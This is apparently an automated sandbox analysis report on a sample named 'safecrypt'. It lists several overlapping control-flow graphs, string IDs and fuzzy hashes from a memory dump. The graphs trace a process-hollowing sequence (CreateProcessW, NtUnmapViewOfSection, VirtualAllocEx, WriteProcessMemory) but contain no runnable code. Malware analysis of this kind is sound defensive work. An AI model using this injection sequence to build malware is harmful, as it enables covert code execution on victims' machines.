                    control_flow_graph 21 26816a6-26816bc 23 26816be-26816d3 21->23 24 26816df-26816f7 call 26805f3 21->24 30 26816f9-2681734 call 26805f3 call 2680702 23->30 31 26816d5-26816dd call 268003a 23->31 24->30 46 268173a-2681744 30->46 47 26817f2-2681824 call 2681828 30->47 31->24 46->47 51 268174a-2681783 call 268176d 46->51 56 268188b-26818c8 call 2680702 VirtualFree call 26818d5 47->56 57 2681826 47->57 62 2681785-26817a4 call 268003a 51->62 63 26817a6-26817f0 call 26805f3 * 2 call 2680702 51->63 79 26818ca-26818cb 56->79 80 2681936-268193b 56->80 62->63 63->47 82 268193d-2681948 call 2680702 79->82 83 26818ce-26818d2 79->83 80->82 85 268194d-2681976 call 2681983 82->85 83->85 86 26818d4-26818eb 83->86 116 2681978-2681979 85->116 117 26819e4-26819e9 85->117 92 26818ed-268190c call 268003a 86->92 93 268190e-2681934 call 26805f3 * 2 86->93 92->93 93->80 119 26819eb-26819f6 call 2680702 116->119 120 268197c-2681980 116->120 117->119 121 26819fb-2681a13 call 2681a22 119->121 120->121 122 2681982-2681999 120->122 144 2681a59 121->144 145 2681a16-2681a38 121->145 126 268199b-26819ba call 268003a 122->126 127 26819bc-26819e2 call 26805f3 * 2 122->127 126->127 127->117 148 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 144->148 145->148 150 2681a3a-2681a54 call 268003a 145->150 175 2681b0f-2681b10 148->175 176 2681b74 148->176 150->144 177 2681b12-2681b13 175->177 178 2681b77-2681b83 175->178 179 2681b75 176->179 180 2681b74 call 26805f3 176->180 181 2681b84 177->181 182 2681b15-2681b31 177->182 185 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 178->185 183 2681b7a-2681b83 179->183 184 2681b75 call 26805f3 179->184 180->179 181->185 190 2681b33-2681b52 call 268003a 182->190 191 2681b54-2681b75 call 26805f3 * 2 182->191 183->185 184->183 206 2681be0-2681be3 185->206 207 2681c35-2681c39 call 26805f3 185->207 190->191 191->183 211 2681c3b 206->211 212 2681be5-2681c08 206->212 215 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 207->215 211->215 217 2681c0a-2681c29 call 268003a 212->217 218 2681c2b-2681c34 212->218 236 2681cc8-2681ce7 call 268003a 215->236 237 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 215->237 217->218 218->207 236->237 259 2681dd9 237->259 260 2681d70-2681d78 237->260 262 2681dda 259->262 263 2681dd9 call 26805f3 259->263 267 2681d7a-2681d7d 260->267 268 2681dc7-2681dda call 26805f3 * 2 260->268 265 2681ddf-2681df3 call 2680702 262->265 266 2681dda call 26805f3 262->266 263->262 270 2681df8-2681e54 WriteProcessMemory call 2681e3e 265->270 266->265 267->270 271 2681d7f-2681d96 267->271 268->265 296 2681e56-2681e75 call 268003a 270->296 297 2681e77-2681ec3 call 26805f3 * 2 call 2680702 270->297 277 2681d98-2681db7 call 268003a 271->277 278 2681db9-2681dc3 271->278 277->278 278->268 296->297
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 8bfb6e92e4e31dd5dd843396850cfa82e4cbde6d03bc6bfe8889a133e051f80c
                    • Instruction ID: 3395de120616cc84340f660c832c4b99777abb78ec828407a73e7f6d9efba9b9
                    • Opcode Fuzzy Hash: 8bfb6e92e4e31dd5dd843396850cfa82e4cbde6d03bc6bfe8889a133e051f80c
                    • Instruction Fuzzy Hash: 4E027C71A18616EEEF1EB7608C12F3D759ABB83B05F045BEDE00F9A181EE744A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 315 2681828-268183e 317 2681840-2681855 315->317 318 2681861-2681879 call 26805f3 315->318 324 268187b-26818c8 call 26805f3 call 2680702 VirtualFree call 26818d5 317->324 325 2681857-2681860 call 268003a 317->325 318->324 339 26818ca-26818cb 324->339 340 2681936-268193b 324->340 325->318 341 268193d-2681948 call 2680702 339->341 342 26818ce-26818d2 339->342 340->341 343 268194d-2681976 call 2681983 341->343 342->343 344 26818d4-26818eb 342->344 368 2681978-2681979 343->368 369 26819e4-26819e9 343->369 348 26818ed-268190c call 268003a 344->348 349 268190e-2681934 call 26805f3 * 2 344->349 348->349 349->340 371 26819eb-26819f6 call 2680702 368->371 372 268197c-2681980 368->372 369->371 373 26819fb-2681a13 call 2681a22 371->373 372->373 374 2681982-2681999 372->374 396 2681a59 373->396 397 2681a16-2681a38 373->397 378 268199b-26819ba call 268003a 374->378 379 26819bc-26819e2 call 26805f3 * 2 374->379 378->379 379->369 400 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 396->400 397->400 402 2681a3a-2681a54 call 268003a 397->402 427 2681b0f-2681b10 400->427 428 2681b74 400->428 402->396 429 2681b12-2681b13 427->429 430 2681b77-2681b83 427->430 431 2681b75 428->431 432 2681b74 call 26805f3 428->432 433 2681b84 429->433 434 2681b15-2681b31 429->434 437 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 430->437 435 2681b7a-2681b83 431->435 436 2681b75 call 26805f3 431->436 432->431 433->437 442 2681b33-2681b52 call 268003a 434->442 443 2681b54-2681b75 call 26805f3 * 2 434->443 435->437 436->435 458 2681be0-2681be3 437->458 459 2681c35-2681c39 call 26805f3 437->459 442->443 443->435 463 2681c3b 458->463 464 2681be5-2681c08 458->464 467 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 459->467 463->467 469 2681c0a-2681c29 call 268003a 464->469 470 2681c2b-2681c34 464->470 488 2681cc8-2681ce7 call 268003a 467->488 489 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 467->489 469->470 470->459 488->489 511 2681dd9 489->511 512 2681d70-2681d78 489->512 514 2681dda 511->514 515 2681dd9 call 26805f3 511->515 519 2681d7a-2681d7d 512->519 520 2681dc7-2681dda call 26805f3 * 2 512->520 517 2681ddf-2681df3 call 2680702 514->517 518 2681dda call 26805f3 514->518 515->514 522 2681df8-2681e54 WriteProcessMemory call 2681e3e 517->522 518->517 519->522 523 2681d7f-2681d96 519->523 520->517 548 2681e56-2681e75 call 268003a 522->548 549 2681e77-2681ec3 call 26805f3 * 2 call 2680702 522->549 529 2681d98-2681db7 call 268003a 523->529 530 2681db9-2681dc3 523->530 529->530 530->520 548->549
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 75a0a3093dcc1256c6f6a8c3742ac2abb117dd52b3ba4473718badf47a093bf3
                    • Instruction ID: 1b2368cee17306a58dccfe8ee0742e9a1d8d6eebd8981cdab213c366a28bc598
                    • Opcode Fuzzy Hash: 75a0a3093dcc1256c6f6a8c3742ac2abb117dd52b3ba4473718badf47a093bf3
                    • Instruction Fuzzy Hash: 8EF17A71A18606EEEF1EB7618C12F3D759ABB83B05F045BDDA10F9A181FE784A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 567 2681836-268183e 568 2681840-2681855 567->568 569 2681861-2681879 call 26805f3 567->569 575 268187b-26818c8 call 26805f3 call 2680702 VirtualFree call 26818d5 568->575 576 2681857-2681860 call 268003a 568->576 569->575 590 26818ca-26818cb 575->590 591 2681936-268193b 575->591 576->569 592 268193d-2681948 call 2680702 590->592 593 26818ce-26818d2 590->593 591->592 594 268194d-2681976 call 2681983 592->594 593->594 595 26818d4-26818eb 593->595 619 2681978-2681979 594->619 620 26819e4-26819e9 594->620 599 26818ed-268190c call 268003a 595->599 600 268190e-2681934 call 26805f3 * 2 595->600 599->600 600->591 622 26819eb-26819f6 call 2680702 619->622 623 268197c-2681980 619->623 620->622 624 26819fb-2681a13 call 2681a22 622->624 623->624 625 2681982-2681999 623->625 647 2681a59 624->647 648 2681a16-2681a38 624->648 629 268199b-26819ba call 268003a 625->629 630 26819bc-26819e2 call 26805f3 * 2 625->630 629->630 630->620 651 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 647->651 648->651 653 2681a3a-2681a54 call 268003a 648->653 678 2681b0f-2681b10 651->678 679 2681b74 651->679 653->647 680 2681b12-2681b13 678->680 681 2681b77-2681b83 678->681 682 2681b75 679->682 683 2681b74 call 26805f3 679->683 684 2681b84 680->684 685 2681b15-2681b31 680->685 688 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 681->688 686 2681b7a-2681b83 682->686 687 2681b75 call 26805f3 682->687 683->682 684->688 693 2681b33-2681b52 call 268003a 685->693 694 2681b54-2681b75 call 26805f3 * 2 685->694 686->688 687->686 709 2681be0-2681be3 688->709 710 2681c35-2681c39 call 26805f3 688->710 693->694 694->686 714 2681c3b 709->714 715 2681be5-2681c08 709->715 718 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 710->718 714->718 720 2681c0a-2681c29 call 268003a 715->720 721 2681c2b-2681c34 715->721 739 2681cc8-2681ce7 call 268003a 718->739 740 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 718->740 720->721 721->710 739->740 762 2681dd9 740->762 763 2681d70-2681d78 740->763 765 2681dda 762->765 766 2681dd9 call 26805f3 762->766 770 2681d7a-2681d7d 763->770 771 2681dc7-2681dda call 26805f3 * 2 763->771 768 2681ddf-2681df3 call 2680702 765->768 769 2681dda call 26805f3 765->769 766->765 773 2681df8-2681e54 WriteProcessMemory call 2681e3e 768->773 769->768 770->773 774 2681d7f-2681d96 770->774 771->768 799 2681e56-2681e75 call 268003a 773->799 800 2681e77-2681ec3 call 26805f3 * 2 call 2680702 773->800 780 2681d98-2681db7 call 268003a 774->780 781 2681db9-2681dc3 774->781 780->781 781->771 799->800
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 9502e744bd9e8b834948add4f3d20355d7be1e921f36745f69c6a4dc6e075dcb
                    • Instruction ID: e1cebe2b2623528bcff17fa819511093973fab8fe416483583baec8dc3618cf3
                    • Opcode Fuzzy Hash: 9502e744bd9e8b834948add4f3d20355d7be1e921f36745f69c6a4dc6e075dcb
                    • Instruction Fuzzy Hash: ADF17A71A18606EEEF1EB7618C12F3D759ABB83B05F045BDDA10F9A181FE784A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 818 2681852-2681855 820 268187b-26818c8 call 26805f3 call 2680702 VirtualFree call 26818d5 818->820 821 2681857-2681879 call 268003a call 26805f3 818->821 839 26818ca-26818cb 820->839 840 2681936-268193b 820->840 821->820 841 268193d-2681948 call 2680702 839->841 842 26818ce-26818d2 839->842 840->841 843 268194d-2681976 call 2681983 841->843 842->843 844 26818d4-26818eb 842->844 868 2681978-2681979 843->868 869 26819e4-26819e9 843->869 848 26818ed-268190c call 268003a 844->848 849 268190e-2681934 call 26805f3 * 2 844->849 848->849 849->840 871 26819eb-26819f6 call 2680702 868->871 872 268197c-2681980 868->872 869->871 873 26819fb-2681a13 call 2681a22 871->873 872->873 874 2681982-2681999 872->874 896 2681a59 873->896 897 2681a16-2681a38 873->897 878 268199b-26819ba call 268003a 874->878 879 26819bc-26819e2 call 26805f3 * 2 874->879 878->879 879->869 900 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 896->900 897->900 902 2681a3a-2681a54 call 268003a 897->902 927 2681b0f-2681b10 900->927 928 2681b74 900->928 902->896 929 2681b12-2681b13 927->929 930 2681b77-2681b83 927->930 931 2681b75 928->931 932 2681b74 call 26805f3 928->932 933 2681b84 929->933 934 2681b15-2681b31 929->934 937 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 930->937 935 2681b7a-2681b83 931->935 936 2681b75 call 26805f3 931->936 932->931 933->937 942 2681b33-2681b52 call 268003a 934->942 943 2681b54-2681b75 call 26805f3 * 2 934->943 935->937 936->935 958 2681be0-2681be3 937->958 959 2681c35-2681c39 call 26805f3 937->959 942->943 943->935 963 2681c3b 958->963 964 2681be5-2681c08 958->964 967 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 959->967 963->967 969 2681c0a-2681c29 call 268003a 964->969 970 2681c2b-2681c34 964->970 988 2681cc8-2681ce7 call 268003a 967->988 989 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 967->989 969->970 970->959 988->989 1011 2681dd9 989->1011 1012 2681d70-2681d78 989->1012 1014 2681dda 1011->1014 1015 2681dd9 call 26805f3 1011->1015 1019 2681d7a-2681d7d 1012->1019 1020 2681dc7-2681dda call 26805f3 * 2 1012->1020 1017 2681ddf-2681df3 call 2680702 1014->1017 1018 2681dda call 26805f3 1014->1018 1015->1014 1022 2681df8-2681e54 WriteProcessMemory call 2681e3e 1017->1022 1018->1017 1019->1022 1023 2681d7f-2681d96 1019->1023 1020->1017 1048 2681e56-2681e75 call 268003a 1022->1048 1049 2681e77-2681ec3 call 26805f3 * 2 call 2680702 1022->1049 1029 2681d98-2681db7 call 268003a 1023->1029 1030 2681db9-2681dc3 1023->1030 1029->1030 1030->1020 1048->1049
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: e08d23f83d4464460235eeb104c9c910700ea022e7404803ec5bafce6990c29a
                    • Instruction ID: 4e1083a66460255b99a260e3e21966b0dcf64c7171ecd499842b4f57ad197f2d
                    • Opcode Fuzzy Hash: e08d23f83d4464460235eeb104c9c910700ea022e7404803ec5bafce6990c29a
                    • Instruction Fuzzy Hash: 43F18D71A18506EEEF1E77618C12F3D799ABB83B05F045BDDA10F9A181FE744A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1067 268186d-26818c8 call 26805f3 * 2 call 2680702 VirtualFree call 26818d5 1082 26818ca-26818cb 1067->1082 1083 2681936-268193b 1067->1083 1084 268193d-2681948 call 2680702 1082->1084 1085 26818ce-26818d2 1082->1085 1083->1084 1086 268194d-2681976 call 2681983 1084->1086 1085->1086 1087 26818d4-26818eb 1085->1087 1111 2681978-2681979 1086->1111 1112 26819e4-26819e9 1086->1112 1091 26818ed-268190c call 268003a 1087->1091 1092 268190e-2681934 call 26805f3 * 2 1087->1092 1091->1092 1092->1083 1114 26819eb-26819f6 call 2680702 1111->1114 1115 268197c-2681980 1111->1115 1112->1114 1116 26819fb-2681a13 call 2681a22 1114->1116 1115->1116 1117 2681982-2681999 1115->1117 1139 2681a59 1116->1139 1140 2681a16-2681a38 1116->1140 1121 268199b-26819ba call 268003a 1117->1121 1122 26819bc-26819e2 call 26805f3 * 2 1117->1122 1121->1122 1122->1112 1143 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 1139->1143 1140->1143 1145 2681a3a-2681a54 call 268003a 1140->1145 1170 2681b0f-2681b10 1143->1170 1171 2681b74 1143->1171 1145->1139 1172 2681b12-2681b13 1170->1172 1173 2681b77-2681b83 1170->1173 1174 2681b75 1171->1174 1175 2681b74 call 26805f3 1171->1175 1176 2681b84 1172->1176 1177 2681b15-2681b31 1172->1177 1180 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 1173->1180 1178 2681b7a-2681b83 1174->1178 1179 2681b75 call 26805f3 1174->1179 1175->1174 1176->1180 1185 2681b33-2681b52 call 268003a 1177->1185 1186 2681b54-2681b75 call 26805f3 * 2 1177->1186 1178->1180 1179->1178 1201 2681be0-2681be3 1180->1201 1202 2681c35-2681c39 call 26805f3 1180->1202 1185->1186 1186->1178 1206 2681c3b 1201->1206 1207 2681be5-2681c08 1201->1207 1210 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 1202->1210 1206->1210 1212 2681c0a-2681c29 call 268003a 1207->1212 1213 2681c2b-2681c34 1207->1213 1231 2681cc8-2681ce7 call 268003a 1210->1231 1232 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 1210->1232 1212->1213 1213->1202 1231->1232 1254 2681dd9 1232->1254 1255 2681d70-2681d78 1232->1255 1257 2681dda 1254->1257 1258 2681dd9 call 26805f3 1254->1258 1262 2681d7a-2681d7d 1255->1262 1263 2681dc7-2681dda call 26805f3 * 2 1255->1263 1260 2681ddf-2681df3 call 2680702 1257->1260 1261 2681dda call 26805f3 1257->1261 1258->1257 1265 2681df8-2681e54 WriteProcessMemory call 2681e3e 1260->1265 1261->1260 1262->1265 1266 2681d7f-2681d96 1262->1266 1263->1260 1291 2681e56-2681e75 call 268003a 1265->1291 1292 2681e77-2681ec3 call 26805f3 * 2 call 2680702 1265->1292 1272 2681d98-2681db7 call 268003a 1266->1272 1273 2681db9-2681dc3 1266->1273 1272->1273 1273->1263 1291->1292
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: a962fcf435c8cb7aa2d987b1e711c5460eb804a3c95d6236ae7c51eea72646d1
                    • Instruction ID: 60ede3d11a720cfa5f388c135211fb79193d058f38f19cbff854daafd955799b
                    • Opcode Fuzzy Hash: a962fcf435c8cb7aa2d987b1e711c5460eb804a3c95d6236ae7c51eea72646d1
                    • Instruction Fuzzy Hash: 1EE17C71A18616EEEF1EB7608C12F3D759ABB83B05F045BDDA10F9A181FE784A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1310 2681892-26818c8 call 2680702 VirtualFree call 26818d5 1317 26818ca-26818cb 1310->1317 1318 2681936-268193b 1310->1318 1319 268193d-2681948 call 2680702 1317->1319 1320 26818ce-26818d2 1317->1320 1318->1319 1321 268194d-2681976 call 2681983 1319->1321 1320->1321 1322 26818d4-26818eb 1320->1322 1346 2681978-2681979 1321->1346 1347 26819e4-26819e9 1321->1347 1326 26818ed-268190c call 268003a 1322->1326 1327 268190e-2681934 call 26805f3 * 2 1322->1327 1326->1327 1327->1318 1349 26819eb-26819f6 call 2680702 1346->1349 1350 268197c-2681980 1346->1350 1347->1349 1351 26819fb-2681a13 call 2681a22 1349->1351 1350->1351 1352 2681982-2681999 1350->1352 1374 2681a59 1351->1374 1375 2681a16-2681a38 1351->1375 1356 268199b-26819ba call 268003a 1352->1356 1357 26819bc-26819e2 call 26805f3 * 2 1352->1357 1356->1357 1357->1347 1378 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 1374->1378 1375->1378 1380 2681a3a-2681a54 call 268003a 1375->1380 1405 2681b0f-2681b10 1378->1405 1406 2681b74 1378->1406 1380->1374 1407 2681b12-2681b13 1405->1407 1408 2681b77-2681b83 1405->1408 1409 2681b75 1406->1409 1410 2681b74 call 26805f3 1406->1410 1411 2681b84 1407->1411 1412 2681b15-2681b31 1407->1412 1415 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 1408->1415 1413 2681b7a-2681b83 1409->1413 1414 2681b75 call 26805f3 1409->1414 1410->1409 1411->1415 1420 2681b33-2681b52 call 268003a 1412->1420 1421 2681b54-2681b75 call 26805f3 * 2 1412->1421 1413->1415 1414->1413 1436 2681be0-2681be3 1415->1436 1437 2681c35-2681c39 call 26805f3 1415->1437 1420->1421 1421->1413 1441 2681c3b 1436->1441 1442 2681be5-2681c08 1436->1442 1445 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 1437->1445 1441->1445 1447 2681c0a-2681c29 call 268003a 1442->1447 1448 2681c2b-2681c34 1442->1448 1466 2681cc8-2681ce7 call 268003a 1445->1466 1467 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 1445->1467 1447->1448 1448->1437 1466->1467 1489 2681dd9 1467->1489 1490 2681d70-2681d78 1467->1490 1492 2681dda 1489->1492 1493 2681dd9 call 26805f3 1489->1493 1497 2681d7a-2681d7d 1490->1497 1498 2681dc7-2681dda call 26805f3 * 2 1490->1498 1495 2681ddf-2681df3 call 2680702 1492->1495 1496 2681dda call 26805f3 1492->1496 1493->1492 1500 2681df8-2681e54 WriteProcessMemory call 2681e3e 1495->1500 1496->1495 1497->1500 1501 2681d7f-2681d96 1497->1501 1498->1495 1526 2681e56-2681e75 call 268003a 1500->1526 1527 2681e77-2681ec3 call 26805f3 * 2 call 2680702 1500->1527 1507 2681d98-2681db7 call 268003a 1501->1507 1508 2681db9-2681dc3 1501->1508 1507->1508 1508->1498 1526->1527
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 20bca425bb6bc7db7330be5875ba669a92a16f5a1a5e7e0a0fd3a0b870a201cb
                    • Instruction ID: 4557db856640f2a596264732bea65a9650f2fe630fc7acbdeae674fc1fa3b878
                    • Opcode Fuzzy Hash: 20bca425bb6bc7db7330be5875ba669a92a16f5a1a5e7e0a0fd3a0b870a201cb
                    • Instruction Fuzzy Hash: 15E16B71A18616EEEF1EB7608C12F3D759ABB83B05F045BDDA10F9A181FE784A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1545 2681899-26818c8 call 2680702 VirtualFree call 26818d5 1552 26818ca-26818cb 1545->1552 1553 2681936-268193b 1545->1553 1554 268193d-2681948 call 2680702 1552->1554 1555 26818ce-26818d2 1552->1555 1553->1554 1556 268194d-2681976 call 2681983 1554->1556 1555->1556 1557 26818d4-26818eb 1555->1557 1581 2681978-2681979 1556->1581 1582 26819e4-26819e9 1556->1582 1561 26818ed-268190c call 268003a 1557->1561 1562 268190e-2681934 call 26805f3 * 2 1557->1562 1561->1562 1562->1553 1584 26819eb-26819f6 call 2680702 1581->1584 1585 268197c-2681980 1581->1585 1582->1584 1586 26819fb-2681a13 call 2681a22 1584->1586 1585->1586 1587 2681982-2681999 1585->1587 1609 2681a59 1586->1609 1610 2681a16-2681a38 1586->1610 1591 268199b-26819ba call 268003a 1587->1591 1592 26819bc-26819e2 call 26805f3 * 2 1587->1592 1591->1592 1592->1582 1613 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 1609->1613 1610->1613 1615 2681a3a-2681a54 call 268003a 1610->1615 1640 2681b0f-2681b10 1613->1640 1641 2681b74 1613->1641 1615->1609 1642 2681b12-2681b13 1640->1642 1643 2681b77-2681b83 1640->1643 1644 2681b75 1641->1644 1645 2681b74 call 26805f3 1641->1645 1646 2681b84 1642->1646 1647 2681b15-2681b31 1642->1647 1650 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 1643->1650 1648 2681b7a-2681b83 1644->1648 1649 2681b75 call 26805f3 1644->1649 1645->1644 1646->1650 1655 2681b33-2681b52 call 268003a 1647->1655 1656 2681b54-2681b75 call 26805f3 * 2 1647->1656 1648->1650 1649->1648 1671 2681be0-2681be3 1650->1671 1672 2681c35-2681c39 call 26805f3 1650->1672 1655->1656 1656->1648 1676 2681c3b 1671->1676 1677 2681be5-2681c08 1671->1677 1680 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 1672->1680 1676->1680 1682 2681c0a-2681c29 call 268003a 1677->1682 1683 2681c2b-2681c34 1677->1683 1701 2681cc8-2681ce7 call 268003a 1680->1701 1702 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 1680->1702 1682->1683 1683->1672 1701->1702 1724 2681dd9 1702->1724 1725 2681d70-2681d78 1702->1725 1727 2681dda 1724->1727 1728 2681dd9 call 26805f3 1724->1728 1732 2681d7a-2681d7d 1725->1732 1733 2681dc7-2681dda call 26805f3 * 2 1725->1733 1730 2681ddf-2681df3 call 2680702 1727->1730 1731 2681dda call 26805f3 1727->1731 1728->1727 1735 2681df8-2681e08 WriteProcessMemory 1730->1735 1731->1730 1732->1735 1736 2681d7f-2681d96 1732->1736 1733->1730 1748 2681e0e-2681e54 call 2681e3e 1735->1748 1742 2681d98-2681db7 call 268003a 1736->1742 1743 2681db9-2681dc3 1736->1743 1742->1743 1743->1733 1761 2681e56-2681e75 call 268003a 1748->1761 1762 2681e77-2681ec3 call 26805f3 * 2 call 2680702 1748->1762 1761->1762
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 1263568516-2896586159
                    • Opcode ID: 0ad37686b73d42f9ba08fb40293c8ae0647b5e22a8e38f5519475c7b8fa4fe0e
                    • Instruction ID: ad636444c265a8fa086bab7fb55b1c78a3a5813db89772ec3a6336cded2fe538
                    • Opcode Fuzzy Hash: 0ad37686b73d42f9ba08fb40293c8ae0647b5e22a8e38f5519475c7b8fa4fe0e
                    • Instruction Fuzzy Hash: 70E16B71A18615EEEF1EB7608C12F3D759ABB83B05F045BDDA10F9A181FE784A03C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1780 26818d5-26818eb 1782 26818ed-268190c call 268003a 1780->1782 1783 268190e-2681976 call 26805f3 * 2 call 2680702 call 2681983 1780->1783 1782->1783 1808 2681978-2681979 1783->1808 1809 26819e4-26819e9 1783->1809 1810 26819eb-26819f6 call 2680702 1808->1810 1811 268197c-2681980 1808->1811 1809->1810 1812 26819fb-2681a13 call 2681a22 1810->1812 1811->1812 1813 2681982-2681999 1811->1813 1835 2681a59 1812->1835 1836 2681a16-2681a38 1812->1836 1817 268199b-26819ba call 268003a 1813->1817 1818 26819bc-26819e2 call 26805f3 * 2 1813->1818 1817->1818 1818->1809 1839 2681a5b-2681b0d call 26805f3 * 2 call 2680702 call 2681b1b 1835->1839 1836->1839 1841 2681a3a-2681a54 call 268003a 1836->1841 1866 2681b0f-2681b10 1839->1866 1867 2681b74 1839->1867 1841->1835 1868 2681b12-2681b13 1866->1868 1869 2681b77-2681b83 1866->1869 1870 2681b75 1867->1870 1871 2681b74 call 26805f3 1867->1871 1872 2681b84 1868->1872 1873 2681b15-2681b31 1868->1873 1876 2681b87-2681bde call 2680702 CreateProcessW call 2681bf2 1869->1876 1874 2681b7a-2681b83 1870->1874 1875 2681b75 call 26805f3 1870->1875 1871->1870 1872->1876 1881 2681b33-2681b52 call 268003a 1873->1881 1882 2681b54-2681b75 call 26805f3 * 2 1873->1882 1874->1876 1875->1874 1897 2681be0-2681be3 1876->1897 1898 2681c35-2681c39 call 26805f3 1876->1898 1881->1882 1882->1874 1902 2681c3b 1897->1902 1903 2681be5-2681c08 1897->1903 1906 2681c3e-2681cc6 call 26805f3 call 2680702 NtUnmapViewOfSection call 2681cb0 1898->1906 1902->1906 1908 2681c0a-2681c29 call 268003a 1903->1908 1909 2681c2b-2681c34 1903->1909 1927 2681cc8-2681ce7 call 268003a 1906->1927 1928 2681ce9-2681d6e call 26805f3 * 2 call 2680702 VirtualAllocEx call 2681d80 1906->1928 1908->1909 1909->1898 1927->1928 1950 2681dd9 1928->1950 1951 2681d70-2681d78 1928->1951 1953 2681dda 1950->1953 1954 2681dd9 call 26805f3 1950->1954 1958 2681d7a-2681d7d 1951->1958 1959 2681dc7-2681dda call 26805f3 * 2 1951->1959 1956 2681ddf-2681df3 call 2680702 1953->1956 1957 2681dda call 26805f3 1953->1957 1954->1953 1961 2681df8-2681e54 WriteProcessMemory call 2681e3e 1956->1961 1957->1956 1958->1961 1962 2681d7f-2681d96 1958->1962 1959->1956 1987 2681e56-2681e75 call 268003a 1961->1987 1988 2681e77-2681ec3 call 26805f3 * 2 call 2680702 1961->1988 1968 2681d98-2681db7 call 268003a 1962->1968 1969 2681db9-2681dc3 1962->1969 1968->1969 1969->1959 1987->1988
